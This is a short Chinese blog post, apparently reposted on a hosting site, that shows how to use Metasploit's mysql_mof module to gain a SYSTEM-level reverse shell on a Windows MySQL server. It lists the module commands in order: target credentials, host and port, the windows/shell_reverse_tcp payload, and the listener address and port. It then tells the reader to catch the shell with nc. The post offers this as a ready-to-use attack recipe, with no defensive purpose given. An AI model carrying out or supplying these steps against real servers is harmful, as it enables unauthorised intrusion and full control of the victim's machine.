mysql mof+metasploit反弹shell

发布时间:2020-06-25 13:53:46 作者:z2pp
来源:网络 阅读:2739

鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权

metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网

use exploit/windows/mysql/mysql_mof
set password xxx    //设置登录mysql的密码
set username xxx    //设置登录mysql的用户
set rhost xxx       //设置要登录的ip地址
set rport xxxx      //设置mysql的端口号
set payload windows/shell_reverse_tcp    //所使用的反弹模块
set lhost xxx       //反弹到的ip地址
set lport xxx       //反弹到的端口
show options        //设置完成后,使用该命令可查看设置参数情况
exploit             //执行


mysql mof+metasploit反弹shell

如没问题,即exploit执行

这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行

mysql mof+metasploit反弹shell


错误之处,敬请指正

推荐阅读:
  1. Linux怎么卸载MySQL
  2. MySQL如何安装

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

mysql 提权 mof

上一篇:Redis集群中的节点是什么

下一篇:redis如何进行序列化

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》